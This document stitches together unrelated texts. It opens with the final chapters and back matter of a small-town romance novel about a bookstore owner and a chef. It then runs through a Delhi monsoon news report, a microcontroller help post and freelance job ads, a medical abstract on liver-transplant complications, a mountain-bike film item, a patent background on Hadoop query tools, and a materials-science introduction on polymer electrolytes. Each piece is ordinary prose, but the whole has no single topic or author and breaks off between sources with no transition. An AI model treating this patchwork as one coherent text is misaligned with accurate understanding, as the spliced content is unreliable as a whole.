"Oh God," Gen said. "Oh God. Listen. I'll get the girls. We need an intervention. Just stay there. Don't go anywhere. Okay?" She hung up, and Kate sat behind the counter in her little store, stunned.
She knew Jackson had a track record of short-term relationships. She knew he wasn't usually a guy who stayed. She just hadn't expected him to run quite so quickly. He wasn't even gone yet—not really—and already, it hurt like hell.
Kate didn't have any right to cry and wail and wallow in self-pity. That's what she told herself. After all, they'd only been on five dates. Five dates didn't make a commitment. Five dates didn't mean forever. She wasn't naïve enough to think that sex changed anything. She didn't want to be the cliché, a woman who believed if a man had sex with her, it meant he loved her.
But even as she was reminding herself of all of that, she also had to acknowledge that there'd been magic. Whatever that mysterious pixie dust was that made you know someone was right for you—that they were the one—it had been sprinkled over Kate in generous, heaping handfuls, and no amount of logic could change that.
She'd thought he felt the same way.
She felt like an idiot.
Gen, Rose, and Lacy scooped Kate out of her shop, whisked her off to Rose's house, took away her cell phone so that Jackson couldn't call from San Francisco and tell her painful lies, and did that thing women do when one of their own has been heartbroken.
They trashed him.
"What an asshole," Rose said, shaking her head. They were all drinking wine Rose had brought home from her shop, in the hope that if Kate got really, really drunk, it would numb the sorrow. "I've known him longest, so I feel like I can say that. He's just a big, puckered-up asshole."
"This is bullshit," Gen added. "I mean, a guy shouldn't be lounging around on your deck wearing nothing but a tablecloth one day, and then driving off to the Bay Area seeking escape routes the next."
"Wait," Lacy said. "I want to hear more about the tablecloth."
"The tablecloth is beside the point," Gen went on. "The point is, he did that, and now he's doing this. It's bullshit."
"And there's the sneaking. And the deception," Lacy said. She took a sizable slug of chardonnay. "If there was an opportunity he just couldn't pass up, why didn't he just _tell_ you about it?"
"Well. Maybe he's not sure what he wants to do," Rose offered. "Maybe he doesn't know if he's going to take it, and why have a big, emotional conversation over something he might not even do?"
"We're not defending him," Gen said. "That's not why we're here. You're off-task."
Rose shrugged. "I'm just saying... "
"Just a minute ago you said he was an asshole," Gen reminded her. "Let's get back to that."
"Well, just... Maybe he's not an asshole so much as he just doesn't have any relationship skills," Rose said.
"This is stupid. This is stupid," Kate said. It was the first time she'd spoken up since they'd arrived. "We had five dates. Five. And I'm here acting like I've been left at the altar. Ugh. I'm the idiot. I'm the asshole in this scenario."
"Oh, honey," Gen said.
"What right do I have to think I have any claim on him?" Kate demanded. "After five dates? What right do I have to... " She pressed a hand to her breastbone, the place where the hurt sat like a stack of hot rocks on her chest. "... To _fall in love_?"
Rose, who was sitting next to Kate on the sofa, reached out and rubbed Kate's arm. "Oh, sweetie. The heart wants what it wants."
"This sucks," Kate said.
"Drink more," Gen said, refilling Kate's wine glass. "It'll help."
"What exactly did Daniel say?" Kate asked Gen.
She shrugged. "He said Jackson got a call out of the blue from a guy who owns this fancy-schmancy restaurant in San Francisco, saying he was interested in Jackson for an executive chef job. He said it was a big opportunity. Money, glory, yadda yadda."
"So he wasn't actually _looking_ for a job? The guy just called him?" Lacy asked.
"That's what I heard."
"Well, at least that's something," Lacy said.
"Not much," Rose said.
"Would you go with him?" Gen ventured. "To San Francisco?"
Kate closed her eyes. "If he asked? I feel like a stupid, idiot loser for saying this, but yeah, I probably would. I'd probably pick up my life and follow him like a puppy after five dates, because that's how ridiculously, stupidly in love I am. God, I suck."
Rose resumed the arm-rubbing. "You don't suck," she said in a soothing voice.
"I want my phone," Kate said.
"No!" Gen and Rose called out in unison as Lacy vehemently shook her head.
"No way," Gen said. "No, no, no. What if he called? What if he left some text or voice mail sticking with this charade that he's just visiting his parents? It's going to make you feel like shit. And if he didn't call, that'll be even worse."
"You'll have to give it back to me eventually," Kate reasoned. "What's the difference?"
"The difference is that we can't get you through the initial shock if he's texting and messaging and making it worse," Gen said. "Trust us."
"But what if... "
_"No,"_ Lacy said.
"I should have known better." Kate buried her face in her hands. "He's a leaver. He's not a... a stayer. We all knew that. I should have known."
Rose got up from the couch, went into the kitchen, rummaged around in a cabinet, and returned with a bottle of tequila and a stack of four shot glasses.
"Wine's not going to cut it," she said.
The drinking worked, but not in the way Kate would have expected. It wasn't the numbing effect of the alcohol that helped her get through her feelings about Jackson. It was the searing, grinding misery of the hangover. When you felt this bad, who could even sort out whether it was heartbreak or Jose Cuervo that had caused it?
She stumbled out of bed the next morning and made some strong, black coffee. She peeked at her cell phone—which had been returned to her, reluctantly, at the end of the night—and found two texts and a voice mail message from Jackson. In none of them did he mention a job interview.
_Liar, liar, pants on fire._
She decided the best course of action was to do nothing. She erased the voice mail message and ignored the texts.
Kate fumbled around in the kitchen, found some Tylenol, and took a couple to combat her headache. Usually, she would drink her coffee out on the deck, but today, her eyes couldn't take the assault of sunlight. She kept the curtains drawn and huddled on her sofa with her coffee.
After a while, Gen came upstairs and knocked with merciful gentleness on the front door. Kate dragged herself over and opened it. Gen looked almost as bad as Kate felt.
"Coffee?" Gen said.
"Yeah," Kate answered, stepping back to let her in. "Tylenol?" she offered.
"Oh God, yes."
With the caffeine and the analgesic seeping into their systems, they sat side by side on the sofa, each of them still in pajamas, with mussed hair and bare feet, saying nothing.
"He called," Kate finally told Gen. "One voice mail, two texts."
"What are you going to do?"
"Nothing, I guess."
Gen nodded. "Yeah."
By the time Jackson got back into town on Tuesday afternoon, Kate still hadn't returned any of his calls or texts. He wondered if maybe her cell phone wasn't working. He tried her land line at home, and got no answer there, either. Finally, he called the store. Fury answered and said Kate wasn't available, though he would offer no more detail than that. The guy sounded kind of pissed.
Jackson got home, unpacked his overnight bag, flopped back on his sofa, and called Daniel.
"Hey, Jackson!" Daniel sounded cheerful. "How'd it go?"
"Good. He offered me the job."
"Wow. How does the place look? Did he make you a good offer?"
Jackson rubbed at the scruff of stubble on his chin. "The place is amazing. And the offer is almost too good to believe. He wants me to create a new menu. A new menu, for a top-tier restaurant like that? This is the show, man. It's what I've been waiting for."
"Well, congratulations. Really."
"Yeah. I guess. Thanks."
Daniel paused. "You don't sound quite as excited as you should be."
"I am. No, I am. It's just... Kate hasn't returned my calls."
Jackson sat up straighter. "What does 'ah' mean?"
"Well, it means I'm not all that surprised. She's got to be upset, right?"
Now Jackson stood. "What do you mean? Upset about what?"
"I'm just saying, you two seemed like you had something good starting up. And now you're looking to leave the area. She's got to be unhappy about it. You had to have expected that."
Jackson spoke slowly and deliberately. "Daniel. How does she know about the job interview? Ryan is the only person I told. I knew he told you, but that was supposed to be it."
Daniel was silent.
"Oh, shit."
"I told Gen. I didn't know it was a secret. I had no idea you didn't tell Kate. Why didn't you tell Kate?"
"Ah, fuck."
"Listen... wow. I'm sorry, man."
Jackson rubbed at his face with his free hand. "Okay. Don't worry about it. I'll... I'll talk to her. I'll deal with it."
"And you're gonna tell her what? That you're leaving? That'll go over well."
"Ah... damn it."
"Good luck with that, man."
A few more phone calls went to voice mail, and he said screw it and headed over there. He walked into the bookstore, and she was behind the counter. When she started to look up, she had a professional look on her face. A _how may I_ _help you_ sort of look. But the moment she saw it was him, a flash of hurt crossed her face, and he felt it like a blow to the chest.
"Kate, can we talk?" He went to her, and she backed up and turned around, picked up a stack of papers, and fixed her eyes on them.
"I'm really busy right now."
"Look. I know you're upset... "
"Jackson." She tossed the papers down—they were just for show anyway—and looked at him. "I can't do this right now. I'm working. I need to work. I'd like you to leave."
He stepped back. "Can we talk later?"
"I don't really see the point," she said.
"You don't see the _point_? You don't see the fuckin'... ah, come on, Kate."
Kate called into the back room. "Fury, would you cover the front for a bit? I have some things to do in the back."
The kid with the eyebrow piercings came out, and Kate went into the back room and snapped the door shut behind her.
Fury looked at Jackson with at least some sympathy. "Dude, you fucked up," he said.
Jackson nodded. It was true. He had.
He turned around and walked out of the store.
Jackson's next stop was the wine shop. He'd known Rose for a few years now, had known her since before he'd gathered up the nerve to even talk to Kate. He would consider Rose a friend, or at least a friendly acquaintance. Maybe she could get through to Kate for him.
When he walked into the shop, Rose was pouring tasting portions for a trio of tourists seated at the bar. He took a seat a few stools down and waited. As she talked to her customers about the qualities and flavor notes of the wine she'd poured for them, she shot Jackson a look that was one part anger, one part pity.
"That stool is for customers," she said.
"What? Come on, Rose, I... "
She pointed at his stool. "Customers."
"Fine. I'll do the tasting. Five wines for ten dollars, right? And you'd goddamned well better give me my free souvenir wine glass."
She scowled at him, and the tourists down the bar looked at him curiously.
Jackson pointed to a chardonnay on the tasting list, and Rose splashed some into a glass and thrust it in front of him.
"Aren't you going to tell me about the oaky notes?" he said.
"Bite me," Rose said.
The tourists started to back timidly away from the bar, and Rose called them back. "I'm sorry," she told the grey-haired guy, probably in his sixties, and the two women of about the same age.
"See," Rose went on, "this guy over there, he was dating one of my best friends. Then, when he had her seeing babies and puppies and white picket fences, he went off to interview for a job in San Francisco. Without telling her. She had to find out through the grapevine." She looked at the wine bottle in her hand. "So to speak."
The tourists looked at Jackson with judgment in their eyes. One of the women muttered something and shook her head.
"She was seeing babies?" Jackson said. "And... what's this about the puppies?"
"She's in love with you, you shithead," Rose said. She splashed wine into the tourists' glasses with some force.
"It sounds like you really hurt her," one of the women at the bar said.
"I... ah, shit. I didn't mean to."
"Uh huh," Rose said. "You meant to run like hell. Like you usually do. And you thought that wouldn't hurt her?"
Jackson ran a hand through his hair. "Rose, Jesus. I... Can you get her to talk to me? Just talk? She won't even answer my calls."
"What? Why not?"
"Because it'll hurt her friend even more to hear you try to justify yourself," one of the women at the bar said.
Rose pointed a finger at her. "Bingo. Here. Have some extra pinot." She poured more wine into the woman's glass. The woman looked pleased.
"I just want to talk to her."
Rose turned to him. "And say what? What are you planning to do? Are you staying or going?"
He didn't answer. He honestly didn't know.
"Right." Rose turned away from him and back toward the tourists. "Until you know, there's no point in talking."
Jackson put a ten dollar bill on the bar and started to slink away.
"You forgot your goddamned souvenir glass!" Rose called after him. "Asshole."
# 24
Jackson needed time to think. But with his schedule, there was no time. He was due back at Neptune that afternoon, and they were closing the restaurant to host a private wedding reception. He likely wouldn't have time to tie his shoes, let alone ponder his future.
Maybe that was good. Maybe that was what he needed—to immerse himself in work. He went home, showered, and went downstairs to start his shift. He put on his chef's coat and tied his apron. The dining room was already decorated and set up for the reception, which would start in a couple of hours. He reviewed the menu. A baby field greens salad with goat cheese and candied walnuts. An appetizer of seared scallops, or a vegetarian option of stuffed mushrooms. A choice of three entrees: salmon with wild rice, beef tenderloin with garlic mashed potatoes, or a vegan risotto. And, of course, the cake, which was being brought in from the bakery on the corner of Main and Burton.
It was all pretty basic, and Jackson found himself wishing for a culinary challenge to keep his mind busy. Was this what the happy couple really wanted to launch their lives together? Salmon? Beef goddamned tenderloin? If they didn't have any more imagination than that, how the hell did they expect to keep a marriage going?
He started banging his way around the kitchen, into and out of the walk-in refrigerator, slamming doors, scowling. He looked over the shoulders of two prep chefs and yelled at them for their uneven carrot julienne.
Goddamned amateurs.
He tasted the salad dressing, and it had too much goddamned vinegar. "What the hell did I tell you about the vinegar?" he said to the prep chef mixing the dressing. "Jesus. Get on your fucking game!"
Jose, who was preparing the marinade for the scallops at a counter about a foot to Jackson's right, looked up.
"You know, she probably just needs time. Let her cool down, then try talking to her."
Did _everybody_ know about his troubles with Kate?
"What the hell are you talking about? How the hell do you know about my relationship problems?"
Jose raised his eyebrows. "Small town, chef. You know how it is."
And so did everyone else, apparently.
Jackson sighed. "I don't know. I don't think it's gonna be that easy."
Jose looked at him. "I didn't say it was gonna be easy. I said let her cool down, and then talk to her." He shook his head. "Truth is, you're probably fucked."
"Yeah, thanks, Jose. That's really helpful."
The rest of the evening, Jackson did some of the worst cooking of his career. He burned some of the fillets. He undercooked at least a few scallops. The risotto crunched. Risotto wasn't supposed to crunch.
Remarkably, though, he didn't hear any complaints from the dining room. Usually, the bridezilla—or the bridezilla's mother—was the first to bitch about every little thing, whether there was truly something wrong with the food or not. But tonight, he heard nothing except laughter, music, and happy conversation from outside the kitchen door.
He took a peek out there once the dinner rush was done, and saw the young bride in a white, silky, A-line dress dancing with her groom, a fairly geeky-looking guy in his twenties, who nevertheless looked like he couldn't believe his luck in landing this beauty, this goddess, this vision of contentment and joy.
Jackson felt a squeezing sensation in his chest and wondered if maybe he was having a heart attack. A Kate attack, more likely.
Gavin came over to stand by Jackson.
"Happy couple," Gavin said. "Sometimes they aren't. Sometimes you can just see the tension under everything, and you know they're not going to last. But these two... who knows? Looks like they've got a shot."
Jackson couldn't breathe; he couldn't think.
"You okay?" Gavin asked him.
"No, man. I'm... no."
"We're about done here. Just the cleanup. You want to head upstairs? We can do the rest without you."
"You sure?" Jackson asked.
"Hey, Gavin."
Gavin looked at him. "Hmm?"
"You probably heard about where I was. Everybody else did. I just wanted to tell you... "
"Don't worry about it." Gavin put a hand on Jackson's shoulder. "You'll do what you've gotta do. I don't know if I could say no to a chance like that. I can find another chef if I have to. I won't like it, but I can do it."
"Thanks, man."
"Sure. Now get out of here. You look like shit, and you've already terrorized the staff enough for one night."
"Yeah. I gotta go. I've gotta make a phone call."
He went up to his apartment and made the call.
He showed up at Kate's house late—after ten p.m. He'd tried to call again, but it had gone to voice mail. He could see that there was a light on in the living room, so he was sure she had to be awake.
He knocked on the door and waited, his hands shaking.
She opened it a crack, saw that it was him, and started to close it again.
"Kate. Don't close the door. Wait. Let me in." He put a hand into the doorway to stop her from closing it, and she shut the door on it. "Ouch! Shit!" He quickly withdrew the hand, and she closed the door. He heard the dead bolt slide into place.
"Goddamn it, Kate," he yelled through the door. "Let me in! I want to talk to you!"
"I don't want to talk to you!" she yelled back.
He thought about what to do. They hadn't been together long enough for him to have a key. He could shout to her through the door. He could slide a note through the door frame. He could hire someone to dress like a monkey and do a singing telegram.
He walked down the stairs at the side of the house and onto the lawn that stretched out under the deck. "Kate!" he yelled up toward the sliding glass door that led to her living room. The living room light turned off—an unmistakable signal to him that it was time to shut up and leave.
But he wasn't going to give up that easily.
He looked around, picked up some pebbles from the ground, and started throwing them, one at a time, at her sliding glass door.
The door slid open slightly and Kate yelled out, "What are you doing? Stop throwing rocks at my window!"
The door slammed shut again.
Right in front of him, one floor below Kate's deck, was another sliding glass door, this one leading into Gen's apartment. The light inside had been off when he'd arrived, but now it came on. Inside, a curtain moved aside and Gen's face peered out through the window. Her door slid open.
"Jackson? What are you doing?"
"I need to talk to Kate."
"Aw, Jackson, I don't... "
"Just hear me out," he said.
She let him inside, and they talked. When he was done, she went to her kitchen drawer, found the key that opened Kate's front door, and handed it to him.
"Don't screw this up," she said.
"I won't," he answered.
When Kate heard the front door unlocking and opening, she called out, "Gen. Hey, is Jackson gone yet? I... " And then she looked up from where she sat in the darkness, and saw him.
She felt everything, all at once. Tenderness, excitement, pain.
"How did you get in?" she said.
He held up Gen's key.
_Traitor._ She was going to have words with Gen later. Or she might have to drown her in the bathtub.
"You shouldn't have come. You need to go." She stood and started walking toward the door, which she intended to hold open for him.
As she passed, he took hold of her arm and turned her toward him. "Please. Just let me talk to you. I shouldn't have gone up there for the interview without telling you. I'm sorry. I didn't know what to do."
She pulled her arm out of his grasp. "You didn't know what to _do_? It's fairly simple, Jackson. You should have just said, 'Kate, this has been fun, but now I'm ready to move on.' You should have _said_ that, Jackson, instead of letting me hear it from someone else."
"But that's not the truth."
"Which part? The part where it's been fun, or the part where you're ready to move on?"
He closed his eyes and took a deep breath. "Both. Both parts. It hasn't been fun. It's been... Kate, it's been _everything._ Everything good. Everything I was missing before. Everything I want, but didn't know I wanted. And I _don't_ want to move on."
As what he had said began to sink in, hummingbirds fluttered just beneath her breastbone. "You don't?"
"But what about the job? You don't want this to end—us—but if you're going to be in San Francisco... "
"I turned it down."
"You what?"
"Tonight. I called the guy and said no. Right before I came over here."
"Wait." She went to the sofa and sat down, hard. "You turned it down because of me?"
"Well, yeah. Or, partly because of you. Mostly because of you."
She held up both hands, palms out, trying to hold off this flood of feelings, of questions.
"But, Jackson. I can't be the reason you said no. I can't be the reason you turned down the opportunity of a lifetime. What if we don't work? What if we don't last? You're going to resent me, because you could have had this great job... "
"We'll work," he said, sitting down beside her. "We'll last."
"How do you know?"
"Because that job wasn't the opportunity of a lifetime. _You_ are."
She turned on the lamp on the side table and looked at him. What she saw in his face made her soft inside, made her feel unbearably fragile and raw. He was everything, too. Her everything.
"Please forgive me," he said.
"You can't run," she told him. "If it gets hard or you get scared. You can't just quit."
"I know. I won't." He reached out and touched her face.
"You have to trust me," she said.
"I do. I will."
He kissed her, and for Kate, it didn't feel difficult or emotionally painful or conflicting. It felt right. It felt like an irresistible force. And most of all, it felt like home.
The next day, when Kate showed up to open the shop, Jane Austen was waiting at the front door, scratching at the glass and meowing.
"Jane Austen!" Kate scooped her up and cuddled the cat into her arms. Jane Austen was purring the purr of the contented.
Jane Austen knew where she belonged, apparently.
So did Jackson.
Kate carried Jane Austen inside and went to find some kibble.
**Read more about Kate and Jackson in the free short story "Jacks Are Wild," available only to my newsletter subscribers.Get your copy here.**
# Read more of the Main Street Merchants series
Cambria Sky
* * *
Nearly Wild
* * *
Fire and Glass
# Read the Delaneys of Cambria series
A Long, Cool Rain
* * *
The Promise of Lightning
* * *
Loving the Storm
* * *
Searching for Sunshine
# Read the Russo Sisters series
Saving Sofia
* * *
First Crush
# Acknowledgments
Writing a novel is never easy, for the author or for the people in that author's life. First and foremost, I would like to thank my husband, John, for his enthusiasm, for his belief in my ability to do this, and for his patience. Date nights spent hashing out the ups and downs of Kate and Jackson's love life might not have been what he had in mind, but he indulged me without fail. He also did more than his share to keep the household running while I was lost in the world of Neptune and Swept Away.
I would like to thank Gaetane Burkolter for volunteering to be my first reader. I greatly appreciate her generosity, her comments, and her encouragement.
Thank you to the Writer Unboxed community. They were always there to answer my questions, offer suggestions, and cheer my accomplishments. While the Writer Unboxed Un-Conference of 2014 wasn't directly involved in the production of this book, I think it's fair to say the novel would not exist without it. That wonderful, warm, giving group of writers gave me the inspiration I needed to keep writing at a time when I had almost given up.
I'd like to thank Cambria, California, for providing the setting for this book and for those to come in the Main Street Merchants series. I can't think of a prettier place to have a romance.
Finally, I'd like to thank my readers. In the words of John Cheever, "I can't write without a reader. It's precisely like a kiss—you can't do it alone."
| {
"pile_set_name": "BookCorpus2"
} |
Updated: Jul 22, 2019 07:20 IST
Several parts of Delhi and the National Capital Region (NCR) received on Sunday the heaviest spell of rain yet for this monsoon season, leading to localised flooding and traffic jams that could have been worse had it been a weekday.
The Safdarjung Observatory, which represents Delhi’s weather, recorded 50.2 mm rainfall between 8.30am and 8.30pm – a level categorised as ‘moderate’. The Aya Nagar weather station had the highest reading at 106 mm.
“The monsoon trough is near Haryana and Punjab, which is close to Delhi. That is triggering the showers. Over the next two days there could be light rain and thunder activity. There could be another spell of ‘moderate’ to ‘heavy’ showers between July 24 and 27,” said Kuldeep Srivastava, head, regional weather forecasting centre (RWFC), India Meteorological Department.
Previously, the day with the most rain was on July 15, when Safdarjung recorded 28.8mm. In all, the month of July – the first of the monsoon months for Delhi – has recorded 102.7mm, which is 20% lower than the normal for the period. Overall, the monsoon is 41% deficient in the national capital.
The maximum temperature was 36.5°C, two notches below the season’s average while minimum temperature settled at 26.8°C, a notch below normal.
Delhi traffic police and the PWD department said that at least 20 calls regarding waterlogging were received at the control room within an hour after it started raining.
Some of the places where waterlogging took place include Tilak Bridge near ITO W-point, Madhuban Chowk on Outer Ring Road, Punjabi Bagh roundabout, Wazirpur, Rail underbridge near Bhairon Marg trisection on the Ring Road, Chatta Rail Bridge near Red Fort, Hanuman Mandir near Kashmere Gate, Rani Khera, and Katwaria Sarai, near Chirag Dilli flyover. | {
"pile_set_name": "OpenWebText2"
} |
Hello all,
I need help regarding running basic example CAN LIN Programs in Simplicity studio for c8051f560 tb development kit. I have the hardware and the software with example programs all set up and I would like some help regarding the pin connections(which is explained in the example programs).
Hello all,
I need help regarding running basic example CAN LIN Programs in Simplicity studio for c8051f560 tb development kit. I have the hardware and the software with example programs all set up and I would like some help regarding the pin connections(which is explained in the example programs).
Very simple task. I just need a simple working example. There is no UI requirement. A single empty Activity will be ok.
The app should be able to use pocketsphinx to process raw bytes, e.g. [url removed, login to view](xxx) and convert it to text. ([url removed, login to view])
To make it more concrete, I suggest (open to other suggestion)
...design of subscription activity(page). I get message from apple team:
Guideline 3.1.2 - Business - Payments - Subscriptions
We noticed that your app or its metadata did not fully meet the terms and conditions for auto-renewing subscriptions, as specified in Schedule 2, section 3.8(b) of the Paid Applications agreement.
Your app's binary did
...the forex trading and other trading platform EXCLUDING non regulated company and any other related to binary option. we want to level up the traffic and optimise our commission. your job will be to create our PPC campaign, Setup the account selection of a keyword strategy, provide all the adwords tags to our webmaster. help up to see clearly the most converting
Are you a master of openCV?
Do you know how to read qr-codes?
Do you know how to detect logos on images?
Can you easily detect the skew angle and rotate the image properly? (The documents are either slightly rotated (about +/- 0-30°))
Do you know how to change page orientation to have readable text?
Do you know how to despeckle scanned images?
...their tree planting season) simple graphic images with text Just pick one slogan per T-shirt design "Happy Arbor Day!" "Plant a Tree!" "Plant More Trees" "I'm a Tree Hugger" or just "Tree Hugger" or other short positive tree slogan for T-shirts.
ONE COLOR DESIGNS PLEASE!!!! as it appears in sample...
Natural Systems is a small tree service company in Connecticut. We are seeking proposals from multiple freelancers for diverse engaging content, graphics and images for our new social media plan. We have been in business for over 14 years but have never developed a plan or any of the social media platforms. We are starting slowing to focus on quality | {
"pile_set_name": "Pile-CC"
} |
Long-term post-liver transplant complications of renal impairment and diabetes mellitus: data from Singapore.
Patients who survive the initial post-liver transplantation period face the development of chronic diseases in the long run. We studied two important complications of liver transplantation, namely: renal impairment and diabetes mellitus. We analysed adult patients followed-up for more than one year using data from our liver transplant clinical records. Long-term post-transplant renal impairment (RI) was defined as glomerular filtration rate (GFR) less than 60 ml/min/1.73 square metres and long-term post-transplant diabetes mellitus (DM) was defined as fasting blood glucose more than 7.8 mmol/L, that existed at least one year after liver transplantation. Pre- and post-transplant factors that could be associated with these conditions were examined. Altogether, 35 patients were evaluated. Mean age at transplant was 50 years. Mean duration of follow-up was 58.4 months. There was 11.4 percent of pre-transplant RI and 17.0 percent of pre-transplant DM. Prevalence of post-transplant RI was 43.5 percent at one year and 45.0 percent at four years. Long-term post-transplant RI was associated with renal impairment at six months post-transplant (p-value is 0.033). Prevalence of severe post-transplant RI (GFR is less than 30 ml/min/1.73 square metres) at four years was 5.7 percent. Prevalence of post-transplant DM was 45.5 percent at two years but declined to 5.3 percent at four years. Post-transplant renal impairment appears to be a potential long-term problem while post-transplant diabetes mellitus appears to improve with time. | {
"pile_set_name": "PubMed Abstracts"
} |
Brandon Semenuk has become the first mountain biker to film a full segment in a single continuous shot
Brandon switches bikes and hops on to the bike while dropping into a cliff (click to enlarge).
Update: July 29, 2015
Teton Gravity Research has just released “The Making of Brandon Semenuk’s One-Shot Segment.” Be sure to watch this behind the scenes footage in Cambria, California that shows how the crew pulled off this cinematic achievement.
July 23, 2015
To celebrate the release of unReal on iTunes, Teton Gravity Research (TGR) and Anthill release one of the most acclaimed segments from the film. Widely recognized as the best slopestyle mountain biker in the world, Brandon Semenuk has become the first mountain biker to film a full segment in a single continuous shot. This uninterrupted shot was filmed by the most advanced gyro-stabilized camera system, the GSS C520, mounted to a truck on a custom road built next to a custom trail that took three weeks to build. This true cinematic achievement required perfect coordination between Semenuk, Anthill Films, and TGR with regard to athleticism, planning, timing and logistics. Injured at the time, Semenuk only hit the full line once.
The historic moment was produced for unReal, the feature mountain bike film inspired by the unprecedented creative union of production companies TGR and Anthill Films, and the limitless imaginations of a group of the best mountain bikers in the world.
Brandon switches bikes and hops on to the bike while dropping into a cliff. | {
"pile_set_name": "Pile-CC"
} |
Handling huge volumes of data on a daily basis is a task that most organizations have to deal with. Such organizations have been storing huge volumes of data for decades, but now with the availability of new techniques for analyzing those huge data sets, organizations seek to improve their operational efficiency. Data sets today aren't merely larger than the older data sets, but also significantly more complex, for example, unstructured and semi-structured data generated by sensors, web logs, social media, mobile communication, and customer service records.
There are many software frameworks to store and analyze large volumes of data in a massively parallel scale. Apache Hadoop is an example and often cited in many journals, publications, blogs, and other technical articles for massively parallel processing system. It is now known to be the de-facto technology platform for supporting storage of massive amounts of heterogeneous data and processing them.
The Hadoop Distributed File System (HDFS) for data storage and its specialized distributed programming model ‘MapReduce’ for data processing, across relatively inexpensive commodity hardware, may be leveraged for mixing and matching data from many disparate sources and reveal meaningful insights.
However, Hadoop as a technology has several limitations. First, organizations are interested in ‘interactive analytics’, a solution requiring faster time-to-insight when compared to the time it takes for a MapReduce job to execute and provide the required results. Second, the ability to enable analysts and data scientists to directly interact with any data stored in Hadoop, using their existing business intelligence (BI) tools and skills through a well-accepted SQL interface. Apache Hive, however, facilitates querying the data using an SQL-like language called HiveQL, but it is much slower than what the industry demands in terms of interactive querying.
There are several massively parallel query processing (MPQP) tools available in the market that enable organizations to perform interactive SQL-like querying on massive data-sets on the Hadoop platform, called SQL-on-Hadoop tools. However, each of these tools is optimized to perform efficiently for a certain class of queries only, operating on a certain known data type and format on a well-defined hardware and software configuration. The data model and the storage model have to be optimized significantly in order to obtain faster query response times.
To add to the problem, the technological landscape of massively parallel query processing frameworks is large and it becomes increasingly difficult for organizations to evaluate each of these tools for the different kinds of queries they have for processing, operating on varying data-sets, (for example, queries from marketing, analysts, engineers, and senior management). | {
"pile_set_name": "USPTO Backgrounds"
} |
1. Introduction {#sec1-membranes-08-00069}
Polymer electrolytes are regarded as one of the most promising candidates in advanced electrochemical applications, such as "smart" windows, displays, sensors, and more importantly, rechargeable lithium batteries \[[@B1-membranes-08-00069],[@B2-membranes-08-00069],[@B3-membranes-08-00069],[@B4-membranes-08-00069]\]. For this last one, in particular, the research has focused for decades on gel-type membrane \[[@B5-membranes-08-00069]\], generally achieved by immobilizing a liquid solution (for instance, a polar aprotic organic solvent or mixtures with a lithium salt) into a hosting polymeric matrix, such as poly(ethylene oxide) (PEO) and its derivatives (e.g., polyacrylonitrile (PAN), poly(vinylidene fluoride) (PVDF), poly(methyl methacrylate) (PMMA)) \[[@B6-membranes-08-00069],[@B7-membranes-08-00069]\]. Respect to liquid electrolytes, in fact, gel polymer electrolytes (GPEs) are able to conjugate high ion conductivities with good mechanical strength, flexible geometry, reducing of liquid leaking and, thus, higher safety \[[@B8-membranes-08-00069]\].
Owing to its ability to dissolve a large variety of salts, through interaction of its ether oxygen with cations, PEO has been one of the most extensively studied polymer used to prepare solid-state electrolytes, lighter, thinner, and safer for lithium-ion polymer batteries \[[@B9-membranes-08-00069],[@B10-membranes-08-00069]\].
Thought, the low ionic conductivities at room temperature (10^−6^--10^−8^ S cm^−1^), the Li^+^ transference number lower than 0.5 and the poor mechanical strength, still hinder the large scale diffusion of PEO-based device. Conversely, PAN ensures an ionic conductivity of circa 10^−3^ S cm^−1^, satisfactory flame and mechanical resistances, but the dimensional stability of gels is poor \[[@B11-membranes-08-00069],[@B12-membranes-08-00069]\]. After GPE preparation, in fact, a phase separation between the encapsulated electrolyte solution and the PAN matrix typically occurs, leading to a leakage problem and, thus, the passivation phenomena of the lithium electrode when in contact with the gel, as well as failure of the electrode/electrolyte contact both resulting in a dramatic reduction of the ionic conductivity.
One of the strategy undertaken to bypass the drawbacks is the blending method, according to which two or more polymers are mixed to obtain a blend electrolyte. As already probed \[[@B13-membranes-08-00069],[@B14-membranes-08-00069],[@B15-membranes-08-00069],[@B16-membranes-08-00069]\] the method allows to easily control a large number of factors, directly affecting the thermal, mechanical and electrical properties of the final polymer electrolytes. By mixing PMMA and PVdF polymers, Nicotera and coworkers obtained a blend with remarkable improvement of mechanical stability respect to unblended polymers \[[@B17-membranes-08-00069]\]. Helan et al. have been reported outstanding thermal stability up to 230 °C for PAN/PMMA blends, but with quite low ionic conductivity, of the order of 2 × 10^−7^ S cm^−1^ \[[@B18-membranes-08-00069]\]. Very interesting electrical behavior and dimensional stability have been obtained by Choi et al. on PEO-PAN blend gel electrolytes, despite no evidence regarding mechanical resistance being provided \[[@B19-membranes-08-00069]\].
An alternative approach for creating gel electrolyte system with improved mechanical properties and electrochemical performances foresees the incorporation of nanoscale organic/inorganic fillers within the polymer matrix \[[@B20-membranes-08-00069]\]. The addition of SiO~2~ \[[@B21-membranes-08-00069]\], Al~2~O~3~ \[[@B22-membranes-08-00069]\], TiO~2~ \[[@B23-membranes-08-00069]\], and other metal oxides \[[@B24-membranes-08-00069],[@B25-membranes-08-00069]\] generally act as solid plasticizers, softening the polymer backbone and, thus, enhancing the segmental motion of the hosting polymer which, in turn, results in improved ion conductivity.
Among inorganic fillers, layered nanoparticles based on clays have been actively investigated lately since they offer a large number of interesting properties such as high cation exchange capacity, large chemically active surface area, outstanding swelling ability, intercalation, catalytic activity, and high chemical and thermal stability. Finally, the properties of the smectite nanoclays can be tailored using simple chemical methods such as intercalation with organic or inorganic guest molecules. From the above, the dispersion of proper clay minerals within the polymer matrix could enhance the ionic conductivity improving at the same time the strength and heat resistance of the GPE.
Smectite clay with different particle sizes has been effectively tested as filler for the preparation of PEO nanocomposite electrolytes, demonstrating a discrete improvement of ionic conduction \[[@B26-membranes-08-00069]\]. Kurian et al. \[[@B27-membranes-08-00069]\] have shown that the surface modification of clay by ion exchange reactions with cationic organic surfactants such as alkyl amines, enhance the chemical affinity with the polymer matrix, leading to exfoliation of the clay particles and improving the gel's strength. Organic montmorillonite (MMT) prepared by ion exchange with HTAB was dispersed in PAN polymer, obtaining a composite GPEs with improved thermal stability and ionic conductivity \[[@B28-membranes-08-00069]\].
